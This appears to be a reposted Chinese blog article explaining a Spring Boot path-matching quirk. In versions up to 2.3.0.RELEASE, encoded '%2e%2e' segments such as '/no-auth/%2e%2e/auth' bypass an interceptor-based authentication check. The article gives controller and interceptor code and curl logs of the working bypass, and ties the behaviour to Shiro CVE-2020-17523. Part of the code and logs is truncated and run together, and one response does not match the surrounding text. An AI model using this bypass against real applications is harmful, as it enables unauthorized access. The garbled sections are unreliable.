扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 后端开发 > Python >详解SpringBoot中关于%2e的Trick
  • 345

0
分享到

详解SpringBoot中关于%2e的Trick

2024-04-02 19:04:59 345人浏览 独家记忆

Python 官方文档:入门教程 => 点击学习

摘要

分享一个SpringBoot中关于%2e的小Trick。先说结论,当springBoot版本在小于等于2.3.0.RELEASE的情况下, alwaysUseFullPath 为默认

分享一个SpringBoot中关于%2e的小Trick。先说结论,当springBoot版本在小于等于2.3.0.RELEASE的情况下, alwaysUseFullPath 为默认值false,这会使得其获取ServletPath,所以在路由匹配时会对 %2e 进行解码,这可能导致身份验证绕过。而反过来由于高版本将 alwaysUseFullPath 自动配置成了true从而开启全路径,又可能导致一些安全问题。

这里我们来通过一个例子看一下这个Trick,并分析它的原因。

首先我们先来设置SprinBoot版本


<parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.3.0.RELEASE</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>

编写一个Controller


@RestController
public class HttpbinController {
    @RequestMapping(value = "no-auth", method = RequestMethod.GET)
    public String noAuth() {
        return "no-auth";
    }
 
    @RequestMapping(value = "auth", method = RequestMethod.GET)
    public String auth() {
        return "auth";
    }
}

接下来配置对应的Interceptor来实现对除no-auth以外的路由的拦截


@Configuration
public class WEBmvcConfig implements WebMvcConfigurer {
    @Override
    public void addInterceptors(InterceptorReGIStry registry) {
        registry.addInterceptor(handlerInterceptor())
                //配置拦截规则
                .addPathPatterns("*
>
< HTTP/1.1 200
< Content-Type: text/plain;charset=UTF-8
< Content-Length: 4
< Date: Wed, 14 Apr 2021 13:22:03 GMT
<
* Connection #0 to host 127.0.0.1 left intact
auth
* Closing connection 0

RequestURI输出为

RequestURI: /no-auth/%2e%2e/auth

可以看到我们通过 %2e%2e 绕过了PermissionInterceptor的判断,同时匹配路由成功,很显然应用在进行路由匹配时对 %2e 进行了解码。

我们再来切换SpringBoot版本再来看下


<version>2.3.1.RELEASE</version>

发起请求,当然也是过了拦截,但没有匹配路由成功,返回404


$ curl -v "http://127.0.0.1:8080/no-auth/%2e%2e/auth"
*   Trying 127.0.0.1...
* tcp_nodeLAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /no-auth/%2e%2e/auth HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.64.1
> Accept: **
>
< HTTP/1.1 200
< Content-Type: text/plain;charset=UTF-8
< Content-Length: 10
< Date: Wed, 14 Apr 2021 13:48:33 GMT
<
* Connection #0 to host 127.0.0.1 left intact
admin page* Closing connection 0

感兴趣的可以再看看说不定有额外收获

话说回来,可是为什么在高版本中 alwaysUseFullPath 会被设置成true呢?

这就要追溯到 org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration.WebMvcAutoConfigurationAdapter#configurePathMatch
在spring-boot-autoconfigure-2.3.0.RELEASE中

在spring-boot-autoconfigure-2.3.1.RELEASE中

为什么要这样设置?我们查看git log这里给出了答案。

https://GitHub.com/spring-projects/spring-boot/commit/a12a3054c9c5dded034ee72faac20e578b5503af

当Servlet映射为”/”时,官方认为这样配置是更有效率的,因为需要请求路径的处理较少。

配置servlet.path可以通过如下,但通常不会这样配置除非有特殊需求。


spring.mvc.servlet.path=/test/

所以最后,当SpringBoot版本在小于等于2.3.0.RELEASE的情况下, alwaysUseFullPath 为默认值false,这会使得其获取ServletPath,所以在路由匹配时会对 %2e 进行解码,这可能导致身份验证绕过。而高版本为了提高效率对 alwaysUseFullPath 自动配置成了true从而开启全路径,这又造就了shiro的CVE-2020-17523中的一个利用姿势。

到此这篇关于详解SpringBoot中关于%2e的Trick的文章就介绍到这了,更多相关SpringBoot Trick内容请搜索编程网以前的文章或继续浏览下面的相关文章希望大家以后多多支持编程网!

您可能感兴趣的文档:

--结束END--

本文标题: 详解SpringBoot中关于%2e的Trick

本文链接: https://lsjlt.com/news/123634.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作